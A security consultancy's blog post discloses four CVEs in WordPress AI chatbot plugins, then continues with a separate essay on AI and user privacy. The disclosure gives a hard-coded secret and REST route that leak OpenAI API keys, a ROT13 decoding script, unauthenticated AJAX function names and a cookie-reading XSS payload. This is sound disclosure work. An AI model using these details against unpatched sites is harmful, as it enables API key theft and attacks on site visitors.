WordPress AI Plugins: Tell me a secret 

In our previous blog ‘WordPress Plugins: AI-dentifying Chatbot Weak Spots’ (https://prisminfosec.com/wordpress-plugins-ai-dentifying-chatbot-weak-spots/) a series of Issues were identified within AI related WordPress plugins:  

  • CVE-2024-6451 – Admin + Remote-Code-Execution (RCE) 
  • CVE-2024-6723 – Admin + SQL Injection (SQLi) 
  • CVE-2024-6847 – Unauthenticated SQL Injection (SQLi) 
  • CVE-2024-6843 – Unauthenticated Stored Cross-Site Scripting (XSS) 

Today, we will be looking at further vulnerability types within these plugins that don’t provide us with the same adrenaline rush as popping a shell, but clearly show how AI plugins are being rushed through development without thorough consideration for secure coding practices. Prism Infosec were attributed the following CVEs  

  • CVE-2024-6845 – SmartSearchWP < 2.4.6 – Unauthenticated OpenAI Key Disclosure 
  • CVE-2024-7713 – AI Chatbot with ChatGPT by AYS <= 2.0.9 – Unauthenticated OpenAI Key Disclosure 
  • CVE-2024-7714 – AI Assistant with ChatGPT by AYS <= 2.0.9 – Unauthenticated AJAX Calls 
  • CVE-2024-6722 – Chatbot Support AI <= 1.0.2 – Admin+ Stored XSS 

All vulnerabilities mentioned above were submitted to WPScan, who effectively managed the steps required to resolve the issues with the respective plugin owners.

CVE-2024-6845 – SmartSearchWP < 2.4.6 – Unauthenticated OpenAI Key Disclosure 

WPScan: https://wpscan.com/vulnerability/cfaaa843-d89e-42d4-90d9-988293499d26 

The plugin does not have proper authorisation in one of its REST endpoints, allowing unauthenticated users to retrieve the encoded key and then decode it, thereby leaking the OpenAI API key’ 

Within the plugin source code, namely the ‘wdgpt-api-requests.php’ file, an action was identified with a route of ‘/wp-json/wdgpt/v1/api-key’ that allowed unauthenticated requests to be sent to retrieve an encoded OpenAI Secret key that is configured within the plugin settings. 

Figure 1: wdgpt_retrieve_api_key identified in source code. 

Upon reviewing the ‘wdgpt_retrieve_api_key’ function, an interesting check was being performed on a ‘key’ parameter sent within the request whereby a comparison was being made on a (not so) secret code. 

Figure 2: Secret code exposed in source code alongside OpenAPI key decoding logic. 

In order for the request to be successful, a JSON value of {“key”:”U2FsdGVkX1+X”} needed to be sent within the POST request. 

This secret key remained unchanged across all plugin installation and by combining the secret key with the unauthenticated endpoint ‘/wp-json/wdgpt/v1/api-key‘, allowed for the retrieval of the ROT13 OpenAI secret key. 

Figure 3: OpenAI API key retrieval. 

Decoding the ROT13 key with the following Bash script unveiled the in use OpenAI key.  

#!/bin/bash 
echo "$1" | tr 'A-Za-z' 'N-ZA-Mn-za-m' 

CVE-2024-7713 – AI Chatbot with ChatGPT by AYS <= 2.0.9 – Unauthenticated OpenAI Key Disclosure 

WPScan: https://wpscan.com/vulnerability/061eab97-4a84-4738-a1e8-ef9a1261ff73 

The plugin discloses the OpenAI API Key, allowing unauthenticated users to obtain it’ 

Similar to the previous issue (but somehow worse), the OpenAI secret key was found to be disclosed to all users of the chatbot. The Authorization header contained the plaintext value of the API key set within the plugin configuration. This allowed an unauthenticated user to compromise the OpenAI secret key set in the application simply by sending a message through the chatbot.  

Configuration of the OpenAI API key resided within the admin console located at the following URL:  

  • /wp-admin/admin.php?page=ays-chatgpt-assistant&ays_tab=tab3&status=saved 

Once set, the chatbot functionality was available to unauthenticated users by default. By intercepting the request, it was identified that a client-side request was being sent directly to OpenAI, containing the secret key within the Authorization header.  

Request: 

POST /v1/chat/completions HTTP/2
Host: api.openai.com
Content-Length: 312
Sec-Ch-Ua: “Not/A)Brand”;v=”8″, “Chromium”;v=”126″
Content-Type: application/json
Accept-Language: en-US
Sec-Ch-Ua-Mobile: ?0
Authorization: Bearer sk-proj-oL…[REDACTED]…sez

{“temperature”:0.8,”top_p”:1,”max_tokens”:1500,”frequency_penalty”:0.01,”presence_penalty”:0.01,”model”:”gpt-3.5-turbo-16k”,”messages”:[{“role”:”system”,”content”:”Converse as if you are an AI assistant. Answer the question as truthfully as possible. Language: English. “},{“role”:”user”,”content”:”Hi there!”}]}

CVE-2024-7714 – AI Assistant with ChatGPT by AYS <= 2.0.9 – Unauthenticated AJAX Calls 

WPScan: https://wpscan.com/vulnerability/04447c76-a61b-4091-a510-c76fc8ca5664 

‘The plugin lacks sufficient access controls allowing an unauthenticated user to disconnect the plugin from OpenAI, thereby disabling the plugin. Multiple actions are accessible: ‘ays_chatgpt_disconnect’, ‘ays_chatgpt_connect’, and ‘ays_chatgpt_save_feedback’’ 

During source code analysis of the plugin, a ‘wp_ajax_nopriv’ function named ‘ays_chatgpt_admin_ajax’ was identified.  

Figure 4: Unauthenticated admin endpoint identified in source code. 

Upon further inspection of the function contained within the file ‘class-chatgpt-assistant-admin.php’, a ‘function’ parameter sent within the request was being checked to first confirm if a null value was present, before passing the value onto an ‘is_callable’ function, which is used to ‘Verify that a value can be called as a function from the current scope’.  

This essentially allowed for any function within the scope of ‘class-chatgpt-assistant-admin.php’ to be called.  

Figure 5: Function parameter value passed to is_callable() to access specified function. 

The functions that could be accessed from an unauthenticated context included:  

  • ays_chatgpt_disconnect 
  • ays_chatgpt_connect 
  • ays_chatgpt_save_feedback 

By sending the following request from an unauthenticated context it was possible to ‘disconnect’ the current running configuration from OpenAI, essentially performing a Denial of Service for the chatbot functionality.  

Figure 6: Disconnecting the plugin configuration from OpenAI. 
Figure 7: api_key setting updated to empty value. 

CVE-2024-6722 – Chatbot Support AI <= 1.0.2 – Admin+ Stored XSS 

WPScan: https://wpscan.com/vulnerability/ce909d3c-2ef2-4167-87c4-75b5effb2a4d 

The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup) 

Testing of the plugin identified that the settings functionality of the plugin did not effectively sanitise inputs, and as such allowed malicious payloads such as JavaScript code to be accepted and executed within the chatbot instances for visiting users.  

As seen in the screenshot below the payload ‘<img src=123 onerror=alert(document.cookie)>’ was inserted into the Starting Message input within the settings page located at: 

  • /wp-admin/options-general.php?page=chatbot-support-ai-settings 
Figure 8: XSS payload injected into chatbot starting message value. 

The result of this led to the JavaScript being executed within chatbot instances when users visit the application.

Figure 9: XSS payload triggered on new instance of chatbot. 

It is accepted that this vulnerability required administrator privileges to successfully set up the exploit, however, as this issue impacted all visiting users, this would allow malicious scripts to be distributed through the plugin, which could lead to further attacks against other third-party services through the guise of the visiting users’ resources.  

Get Tested

If you are integrating or have already integrated AI or chatbots into your systems, reach out to us. Our comprehensive range of testing and assurance services will ensure your implementation is smooth and secure: https://prisminfosec.com/services/artificial-intelligence-ai-testing 

All vulnerabilities were discovered and written by Kieran Burge of Prism Infosec.  

The Dark side of AI Part 2: Big brother  

AI: Data source or data sink?

The idea of artificial intelligence is not a new one. For decades, people have been finding ways to emulate the pliable nature of the human brain, with machine learning being mankind’s latest attempt. Artificial intelligence models are expected to be learn how to form appropriate responses to given set of inputs. With each “incorrect” response, the AI’s codebase would iteratively modify its response until a “correct” response is reached without further outside intervention.

To achieve this, the model would be fed with vast amounts of training data, which would typically include the interactions of end-users themselves. With well-known AI models found within ChatGPT and Llama, they would be made available to a large population. That’s a lot of input to capture by a select few entities, and that would have to have been stored [1] somewhere before being fed.

And that is a lot of responsibility for the data holders to make sure that it doesn’t fall into the wrong hands. In fact, in March 2023 [2] OpenAI stated that it will no longer be using customer input as training data for their own ChatGPT model; incidentally, in a later report in July 2024, OpenAI remarked that they had suffered a data breach in early 2023 [3]. Though they claim no customer/partner information had been accessed, at this point we only have their word to go by.

AI Companies are like any other tech company – they still must store and process data, and with this they still have the same sets of targets above their head.

The nature of nurturing AI

As with a child learning from a parent, an AI model would begin to learn from the data it is fed and may begin to spot trends in the datasets. These trends would then manifest in the form of opinions- whereby the AI would attempt to provide a response that it thinks would satisfy the user.

Putting it another way, companies would be able to leverage AI to understand preferences [4] of each user and aim to serve content or services that would closely match their tastes, arguably to a finer level of detail than traditional approaches. User data is too valuable an asset for companies and hackers alike to pass up, and it is no secret that everyone using AI would have a unique profile tailored to them.

Surpassing the creator?

It’s also no secret that in one form or another, these profiles can also be used to influence big decisions. For instance, AI is being increasingly used to aid [5] medical professionals in analysing ultrasound measurements and predicting chronic illnesses such as cardiovascular diseases. The time saved in making decisions is would literally be a matter of life and death.

However, this can be turned on its head if it is used as crutch [6] rather than as an aid. Imagine a scenario where a company is looking to hire and decides to leverage an AI to profile all candidates before an interview. For it to work, the candidate must submit some basic personal information, to which the AI would then scour the internet to look for other pieces of data pertaining to the individual. With potentially hundreds of candidates to choose from, the recruiter may lean upon the services of the AI and base their choice on its decision. Logically speaking, this would be a wise decision, as a recruiter would not want to hire someone who is qualified but has a questionable work ethic or has past history of being a liability.

While this would effectively automate the same processes that a recruiter would do themselves, it would be disheartening for the candidate to be rejected an interview on the basis of their background profile that the AI has created of them which may not be fully accurate, even if they meet the job requirements. Conversely, another candidate may be hired due to a more favourable background profile, but in reality they are underqualified to do the job; in both cases this would not be a true representation of the candidates.

Today, AI is not yet mature enough to discern what is true of a person and what is not- it sees data for what it is and acts upon it regardless. All the while, the AI would continue to violate the privacy of the user and build an imperfect profile which could potentially impact their lives for better or worse.

Final conclusions

As with all things, if there is no price for the product, then the user is the product. With AI, even if users are charged a price, whatever companies say otherwise they will become part of the product one way or another. For many users, they choose to accept so long as big tech keep their word on keeping their information safe and secure. But one should ask; safe and secure from whom?

References

This post was written by Leon Yu.